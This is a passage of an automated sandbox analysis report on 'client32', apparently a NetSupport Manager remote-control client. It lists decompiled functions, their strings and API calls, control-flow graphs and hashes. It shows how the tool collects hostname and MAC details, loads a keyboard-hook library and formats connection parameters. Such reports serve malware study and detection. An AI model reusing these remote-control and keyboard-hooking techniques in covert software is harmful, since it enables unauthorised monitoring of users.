                                                                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$305090$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                                        • API String ID: 1866202007-3774753590
                                                                                                                                        • Opcode ID: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                                        • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                                        • Opcode Fuzzy Hash: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                                        • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52
                                                                                                                                        Function 1102D5B0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1027 1102d5b0-1102d600 call 1110c420 1030 1102d602-1102d616 call 1113f0c0 1027->1030 1031 1102d618 1027->1031 1033 1102d61e-1102d663 call 1113e8f0 call 1113f130 1030->1033 1031->1033 1039 1102d803-1102d812 call 11141430 1033->1039 1040 1102d669 1033->1040 1049 1102d818-1102d828 1039->1049 1042 1102d670-1102d673 1040->1042 1043 1102d675-1102d677 1042->1043 1044 1102d698-1102d6a1 1042->1044 1046 1102d680-1102d691 1043->1046 1047 1102d6a7-1102d6ae 1044->1047 1048 1102d7d4-1102d7ed call 1113f130 1044->1048 1046->1046 1050 1102d693 1046->1050 1047->1048 1051 1102d7a3-1102d7b8 call 1115f5b7 1047->1051 1052 1102d6b5-1102d6b7 1047->1052 1053 1102d7ba-1102d7cf call 1115f5b7 1047->1053 1054 1102d74a-1102d77d call 1115e091 call 1113e8f0 1047->1054 1055 1102d78b-1102d7a1 call 11160790 1047->1055 1056 1102d73b-1102d745 1047->1056 1057 1102d77f-1102d789 1047->1057 1058 1102d6fc-1102d702 1047->1058 1059 1102d72c-1102d736 1047->1059 1048->1042 1077 1102d7f3-1102d7f5 1048->1077 1061 1102d82a 1049->1061 1062 1102d82f-1102d843 call 1102c850 1049->1062 1050->1048 1051->1048 1052->1048 1068 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1052->1068 1053->1048 1054->1048 1055->1048 1056->1048 1057->1048 1070 1102d704-1102d718 call 1115f5b7 1058->1070 1071 1102d71d-1102d727 1058->1071 1059->1048 1061->1062 1072 1102d848-1102d84d 1062->1072 1068->1048 1070->1048 1071->1048 1081 1102d8f3-1102d90d call 111429e0 1072->1081 1082 1102d853-1102d878 call 110b6bd0 call 11142a60 1072->1082 1077->1081 1085 1102d7fb-1102d801 1077->1085 1094 1102d963-1102d96f call 1102b120 1081->1094 1095 1102d90f-1102d928 call 1105d340 1081->1095 1102 1102d883-1102d889 1082->1102 1103 1102d87a-1102d881 1082->1103 1085->1039 1085->1049 1106 1102d971-1102d978 1094->1106 1107 1102d948-1102d94f 1094->1107 1095->1094 1110 1102d92a-1102d93c 1095->1110 1108 1102d88b-1102d892 call 110279d0 1102->1108 1109 1102d8e9 1102->1109 1103->1081 1111 1102d955-1102d958 1106->1111 1113 1102d97a-1102d984 1106->1113 1107->1111 1112 1102db5a-1102db7b GetComputerNameA 1107->1112 1108->1109 1125 1102d894-1102d8c6 1108->1125 1109->1081 1110->1094 1126 1102d93e 1110->1126 1115 1102d95a-1102d961 call 110b6bd0 1111->1115 1116 1102d989 1111->1116 1118 1102dbb3-1102dbb9 1112->1118 1119 1102db7d-1102dbb1 call 110278a0 1112->1119 1113->1112 1124 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1115->1124 1116->1124 1122 1102dbbb-1102dbc0 1118->1122 1123 1102dbef-1102dc02 call 11160790 1118->1123 1119->1118 1148 1102dc07-1102dc13 1119->1148 1130 1102dbc6-1102dbca 1122->1130 1145 1102ddf7-1102de1a 1123->1145 1178 1102db2a-1102db32 SetLastError 1124->1178 1179 1102da6c-1102da83 1124->1179 1139 1102d8d0-1102d8df call 110f3da0 1125->1139 1140 1102d8c8-1102d8ce 1125->1140 1126->1107 1133 1102dbe6-1102dbe8 1130->1133 1134 1102dbcc-1102dbce 1130->1134 1144 1102dbeb-1102dbed 1133->1144 1142 1102dbe2-1102dbe4 1134->1142 1143 1102dbd0-1102dbd6 1134->1143 1146 1102d8e2-1102d8e4 call 1102cde0 1139->1146 1140->1139 1140->1146 1142->1144 1143->1133 1149 1102dbd8-1102dbe0 1143->1149 1144->1123 1144->1148 1160 1102de42-1102de4a 1145->1160 1161 1102de1c-1102de22 1145->1161 1146->1109 1151 1102dc15-1102dc2a call 110b6bd0 call 11029870 1148->1151 1152 1102dc2c-1102dc3f call 11080b10 1148->1152 1149->1130 1149->1142 1182 1102dc83-1102dc9c call 11080b10 1151->1182 1172 1102dc41-1102dc64 1152->1172 1173 1102dc66-1102dc68 1152->1173 1166 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1160->1166 1167 1102de4c-1102de59 call 1113f120 call 1115e091 1160->1167 1161->1160 1165 1102de24-1102de3d call 1102cde0 1161->1165 1165->1160 1167->1166 1172->1182 1177 1102dc70-1102dc81 1173->1177 1177->1177 1177->1182 1184 1102daf3-1102daff 1178->1184 1179->1184 1195 1102da85-1102da8e 1179->1195 1202 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1182->1202 1203 1102dddc-1102dde9 call 11160790 1182->1203 1187 1102db42-1102db51 1184->1187 1188 1102db01-1102db0d 1184->1188 1187->1112 1197 1102db53-1102db54 FreeLibrary 1187->1197 1193 1102db1f-1102db23 1188->1193 1194 1102db0f-1102db1d GetProcAddress 1188->1194 1199 1102db34-1102db36 SetLastError 1193->1199 1200 1102db25-1102db28 1193->1200 1194->1193 1195->1184 1204 1102da90-1102dac6 call 11142a60 call 11128350 1195->1204 1197->1112 1208 1102db3c 1199->1208 1200->1208 1239 1102dd33-1102dd49 call 11125f90 1202->1239 1240 1102dd1f-1102dd2e call 110290f0 1202->1240 1216 1102ddec-1102ddf1 CharUpperA 1203->1216 1204->1184 1223 1102dac8-1102daee call 11142a60 call 11027590 1204->1223 1208->1187 1216->1145 1223->1184 1244 1102dd62-1102dd9c call 110ce900 * 2 1239->1244 1245 1102dd4b-1102dd5d call 110ce900 1239->1245 1240->1239 1252 1102ddb2-1102ddda call 11160790 call 110ce4f0 1244->1252 1253 1102dd9e-1102ddad call 110290f0 1244->1253 1245->1244 1252->1216 1253->1252
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                        • API String ID: 1984265443-3756774750
                                                                                                                                        • Opcode ID: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                                        • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                        • Opcode Fuzzy Hash: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                                        • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61
                                                                                                                                        Function 68903D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1259 68903d00-68903d42 call 68911c50 call 68903b80 1263 68903d47-68903d4f 1259->1263 1264 68903d51-68903d6b call 689128e1 1263->1264 1265 68903d6c-68903d6e 1263->1265 1267 68903d70-68903d84 call 688f6f50 1265->1267 1268 68903d87-68903da1 call 688f8fb0 1265->1268 1267->1268 1274 68903da3-68903dc4 call 688f63c0 call 689128e1 1268->1274 1275 68903dc5-68903e44 call 688f5e90 * 2 call 68907be0 call 688f5e20 lstrlenA 1268->1275 1288 68903e46-68903e95 call 6890d8b0 call 688f5060 call 688f4830 call 68911bfd 1275->1288 1289 68903e98-68903fbe call 688f5500 call 688f6050 call 68907c70 * 2 call 68907d00 * 3 call 688f5060 call 68907d00 call 68911bfd call 68907d00 gethostname call 68907d00 call 688fb8e0 1275->1289 1288->1289 1324 68903fc0 1289->1324 1325 68903fc5-68903fe1 call 68907d00 1289->1325 1324->1325 1328 68903fe3-68903ff5 call 68907d00 1325->1328 1329 68903ff8-68903ffe 1325->1329 1328->1329 1331 68904004-68904022 call 688f5e20 1329->1331 1332 6890421a-68904263 call 68907b60 call 68911bfd call 688f98d0 call 689077e0 1329->1332 1338 68904024-68904057 call 688f5060 call 68907d00 call 68911bfd 1331->1338 1339 6890405a-68904084 call 688f5e20 1331->1339 1360 68904292-689042aa call 689128e1 1332->1360 1361 68904265-68904291 call 688fa4e0 call 689128e1 1332->1361 1338->1339 1348 689041d1-68904217 call 68907d00 call 688f5e20 call 68907d00 1339->1348 1349 6890408a-689041ce call 688f5060 call 68907d00 call 68911bfd call 688f5e20 call 688f5060 call 68907d00 call 68911bfd call 688f5e20 call 688f5060 call 68907d00 call 68911bfd call 688f5e20 call 688f5060 call 68907d00 call 68911bfd 1339->1349 1348->1332 1349->1348
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: *Dept$*Gsk$1.1$305090$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        • API String ID: 2102423945-3026469383
                                                                                                                                        • Opcode ID: 92e0bb62de04f40c2618eb65855ad82071d4c9ad0304a6da1c0bbfd7fab52d9b
                                                                                                                                        • Instruction ID: 52b20725f5a3ddb827dfdcaef008150e5c0a94fee5ea769f9b7411efc7f2b807
                                                                                                                                        • Opcode Fuzzy Hash: 92e0bb62de04f40c2618eb65855ad82071d4c9ad0304a6da1c0bbfd7fab52d9b
                                                                                                                                        • Instruction Fuzzy Hash: FFE17076D4062C7BCB20DBA88C80FFF77789F99619F8045D9E51962141EB319B848FE1
                                                                                                                                        Function 1113FBE0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1400 1113fbe0-1113fc21 GetModuleFileNameA 1401 1113fc63 1400->1401 1402 1113fc23-1113fc36 call 11080be0 1400->1402 1404 1113fc69-1113fc6d 1401->1404 1402->1401 1408 1113fc38-1113fc61 LoadLibraryA 1402->1408 1406 1113fc89-1113fca7 GetModuleHandleA GetProcAddress 1404->1406 1407 1113fc6f-1113fc7c LoadLibraryA 1404->1407 1410 1113fcb7-1113fce0 GetProcAddress * 4 1406->1410 1411 1113fca9-1113fcb5 1406->1411 1407->1406 1409 1113fc7e-1113fc86 LoadLibraryA 1407->1409 1408->1404 1409->1406 1412 1113fce3-1113fd5b GetProcAddress * 10 call 1115e4d1 1410->1412 1411->1412 1414 1113fd60-1113fd63 1412->1414
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,762323A0), ref: 1113FC13
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                        • API String ID: 3874234733-2061581830
                                                                                                                                        • Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                        • Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
                                                                                                                                        • Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                        • Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59
                                                                                                                                        Function 1113DAD0 Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 266libraryloaderregistryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1500 1113dad0-1113db15 call 11142a60 1503 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1500->1503 1504 1113db1b-1113db3d call 1105d340 1500->1504 1516 1113dc07 1503->1516 1517 1113dbd5-1113dbdc 1503->1517 1509 1113db8b-1113db92 1504->1509 1510 1113db3f-1113db5c call 11015e10 1504->1510 1509->1503 1514 1113db94-1113dba0 call 11017670 1509->1514 1520 1113db5e-1113db6b GetProcAddress 1510->1520 1521 1113db6d-1113db6f 1510->1521 1514->1503 1524 1113dba2 call 110cb920 1514->1524 1523 1113dc11-1113dc31 GetClassInfoExA 1516->1523 1517->1516 1522 1113dbde-1113dbe5 1517->1522 1520->1521 1525 1113db71-1113db73 SetLastError 1520->1525 1532 1113db79-1113db82 1521->1532 1522->1516 1526 1113dbe7-1113dc05 call 1105d340 1522->1526 1527 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1523->1527 1528 1113dcd9-1113dd34 1523->1528 1524->1503 1525->1532 1526->1523 1541 1113dc61-1113dc75 call 110290f0 1527->1541 1542 1113dc78-1113dcc0 call 11140b20 call 11140b50 LoadCursorA GetStockObject RegisterClassExA 1527->1542 1543 1113dd36-1113dd3d 1528->1543 1544 1113dd6e-1113dd75 1528->1544 1532->1509 1536 1113db84-1113db85 FreeLibrary 1532->1536 1536->1509 1541->1542 1542->1528 1569 1113dcc2-1113dcd6 call 110290f0 1542->1569 1543->1544 1546 1113dd3f-1113dd46 1543->1546 1548 1113ddb1-1113ddd5 call 1105d340 1544->1548 1549 1113dd77-1113dd86 call 1110c420 1544->1549 1546->1544 1552 1113dd48-1113dd5f call 11129900 LoadLibraryA 1546->1552 1559 1113dde3-1113dde8 1548->1559 1560 1113ddd7-1113dde1 1548->1560 1563 1113ddaa 1549->1563 1564 1113dd88-1113dda8 1549->1564 1552->1544 1568 1113dd61-1113dd69 GetProcAddress 1552->1568 1566 1113ddf4-1113ddfb 1559->1566 1567 1113ddea 1559->1567 1560->1566 1565 1113ddac 1563->1565 1564->1565 1565->1548 1570 1113de08-1113de25 call 11139490 1566->1570 1571 1113ddfd-1113de03 call 110f58a0 1566->1571 1567->1566 1568->1544 1569->1528 1578 1113de2b-1113de32 1570->1578 1579 1113deda-1113deea 1570->1579 1571->1570 1580 1113de34-1113de46 call 1110c420 1578->1580 1581 1113de6f-1113de76 1578->1581 1590 1113de61 1580->1590 1591 1113de48-1113de5a call 11159ed0 1580->1591 1583 1113de78-1113de7f 1581->1583 1584 1113de9f-1113deb0 1581->1584 1586 1113de81 call 11131d10 1583->1586 1587 1113de86-1113de9a SetTimer 1583->1587 1588 1113deb2-1113deb9 1584->1588 1589 1113dec9-1113ded4 #17 LoadLibraryA 1584->1589 1586->1587 1587->1584 1588->1589 1593 1113debb-1113dec2 1588->1593 1589->1579 1596 1113de63-1113de6a 1590->1596 1598 1113de5f 1591->1598 1593->1589 1594 1113dec4 call 1112a760 1593->1594 1594->1589 1596->1581 1598->1596
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                        • _memset.LIBCMT ref: 1113DC3D
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                        • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                        • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                        • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                          • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                                                        • String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                        • API String ID: 2794364348-3534351892
